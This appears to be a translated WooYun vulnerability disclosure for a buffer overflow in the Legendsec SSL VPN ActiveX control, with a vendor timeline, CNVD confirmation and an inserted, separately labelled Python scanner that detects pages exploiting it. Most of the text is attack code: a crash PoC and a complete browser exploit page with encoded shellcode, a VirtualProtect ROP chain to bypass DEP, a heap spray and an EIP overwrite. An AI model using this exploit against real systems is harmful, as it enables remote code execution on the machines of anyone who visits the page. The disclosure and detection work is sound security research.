2014-05-29: Details reported to the vendor, awaiting vendor handling
2014-06-03: Vendor has confirmed; details disclosed to the vendor only
2014-06-06: Details opened to third-party security partners
2014-07-28: Details opened to core white hats and domain experts
2014-08-07: Details opened to regular white hats
2014-08-17: Details opened to intern white hats
2014-08-27: Details disclosed to the public
攒钱买垃圾桶
The 网神 (Legendsec) VPN ActiveX control is probably in very wide use.
Name: IeAx Class
Publisher: 网神信息技术(北京)股份有限公司
Type: ActiveX control
Version: 0.0.1.12
File date: (blank)
Last accessed: 2014-05-29 16:46
Class ID: {100C2765-1362-4CCF-AB02-56D916BB8732}
Use count: 59
Blocked count: 3
File: gwieplugin_1c102f225d.dll
Folder: C:\Program Files\Gateway\SSLVPN
<html>
<object classid='clsid:100C2765-1362-4CCF-AB02-56D916BB8732' id='target'></object>
<script>
junk1 = "";
while(junk1.length < 5252) junk1+="A";
target.login(junk1,1,"defaultv","defaultv","defaultv");
</script>
</html>
<html>
<head><title>legendsec sslvpn activex exploit bypass dep on xpsp3 ie8</title></head>
<body>
<!--
EIP contains normal pattern : 0x41346941 (offset 252)
ESP (0x016acb30) points at offset 256 in normal pattern (length 2744)
EBP contains normal pattern : 0x33694132 (offset 248)
ESI (0x016ad090) points at offset 1632 in normal pattern (length 1368)
-->
<object classid="clsid:100C2765-1362-4CCF-AB02-56D916BB8732" id='poc'></object>
<script>
// [ Shellcode ]
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');

var rop_chain =
  "\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]
  "\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]
  "\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]
  "\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]
  "\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]
  "\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx
  "\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]
  "\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]
  "\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]
  "\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]
  "\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]
  "\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
  "\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]
  "\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31
  "\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
  "\u1025\u77c2";  // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]

// [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000){ fill += fill; }

// [ padding offset ]
padding = fill.substring(0, 0x5F6);

// [ fill each chunk with 0x1000 bytes ]
evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);

// [ repeat the block to 512KB ]
while (evilcode.length < 0x40000){ evilcode += evilcode; }

// [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]
var block = evilcode.substring(2, 0x40000 - 0x21);

// [ Allocate 200 MB ]
var slide = new Array();
for (var i = 0; i < 800; i++){ slide[i] = block.substring(0, block.length); }

var junk = '';
while(junk.length<252) junk += 'A';
var junk2 = '';
while(junk2.length<3000) junk2 += 'B';
eip = "\x0c\x0c\x0c\x0c";
popeax = "\x28\x7b\x71\x7d"; // 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll)
xchg = "\x0d\x64\x60\x3d"; // 0x3d60640d : '\x94\xc3' | ascii {PAGE_EXECUTE_READ} [mshtml.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.23588 (C:\WINDOWS\system32\mshtml.dll)
str = "\x0c\x0c\x0c\x0c";
payload = junk + popeax + str + xchg + junk2;
poc.login(payload,1,"defaultv","defaultv","defaultv");
</script>
</body>
</html>
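As an added defender-side example (not part of the report or the vendor's code), here is a small Python scanner a web proxy or mail gateway could run over HTML bodies: it flags pages that instantiate this control's CLSID together with the tell-tale shapes of the PoC pages above (a string padded in a loop before the login() call, 0x0c0c filler, unescape'd %u shellcode). The indicator names, weights and thresholds are my own.

```python
import re

# CLSID of the vulnerable "IeAx Class" control, taken from the report above.
VULN_CLSID = "100C2765-1362-4CCF-AB02-56D916BB8732"

# Indicators drawn from the two PoC pages. Names and weights are my own choice.
INDICATORS = {
    # the control is instantiated at all
    "vuln_clsid_object": re.compile(
        r"classid\s*=\s*['\"]?clsid:" + VULN_CLSID, re.I),
    # its login() method is invoked from script
    "login_call": re.compile(r"\.login\s*\(", re.I),
    # a string grown in a loop until it reaches some length
    "padding_loop": re.compile(
        r"while\s*\(\s*\w+\.length\s*<\s*\w+\s*\)\s*\{?\s*\w+\s*\+=", re.I),
    # 0x0c0c0c0c heap-spray filler in a JS string literal
    "spray_0c0c": re.compile(r"(?:\\u0c0c|\\x0c){2,}", re.I),
    # unescape()'d %u-encoded shellcode
    "unescape_shellcode": re.compile(
        r"unescape\s*\(\s*['\"]%u[0-9a-f]{4}", re.I),
}


def scan_html(html: str) -> dict:
    """Return a verdict for one HTML page (or a captured HTTP response body)."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    score = sum(hits.values())
    # "block" needs the vulnerable control plus at least two exploit markers;
    # any single hit is worth a look while the control has no fix.
    if hits["vuln_clsid_object"] and score >= 3:
        verdict = "block"
    elif score >= 1:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "score": score, "hits": hits}


# Constructed samples (no shellcode): a normal page that uses the control,
# a page shaped like the crash PoC above, and a page without the control.
SAMPLE_NORMAL = ('<object classid="clsid:' + VULN_CLSID + '" id="vpn"></object>'
                 '<script>vpn.login("user",1,"a","b","c");</script>')
SAMPLE_POC_LIKE = ("<object classid='clsid:" + VULN_CLSID + "' id='t'></object>"
                   '<script>junk1 = ""; while(junk1.length < 5252) junk1+="A"; '
                   't.login(junk1,1,"v","v","v");</script>')
SAMPLE_CLEAN = "<html><body><p>No ActiveX here.</p></body></html>"

if __name__ == "__main__":
    for label, page in [("normal", SAMPLE_NORMAL), ("poc-like", SAMPLE_POC_LIKE),
                        ("clean", SAMPLE_CLEAN)]:
        print(label, scan_html(page)["verdict"])
```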
Severity: High
Vulnerability rank: 18
Confirmed: 2014-06-03 11:11
CNVD confirms the described situation and has reported it, together with the other two vulnerabilities submitted to CNCERT on the 29th, to 网神 for handling (a handling channel with them had already been established). Vulnerabilities of this type are relatively rare on WOOYUN; rank 18.
None yet